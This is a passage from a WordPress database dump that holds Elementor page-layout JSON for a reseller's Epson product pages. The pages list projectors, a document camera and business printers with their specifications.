brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]&lt;\\/center&lt;<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8019,3489,'_elementor_version','2.5.14'),(8022,3490,'_wp_page_template','template-fullwidth.php'),(8023,3490,'_elementor_edit_mode','builder'),(8024,3490,'_elementor_template_type','post'),(8025,3490,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette 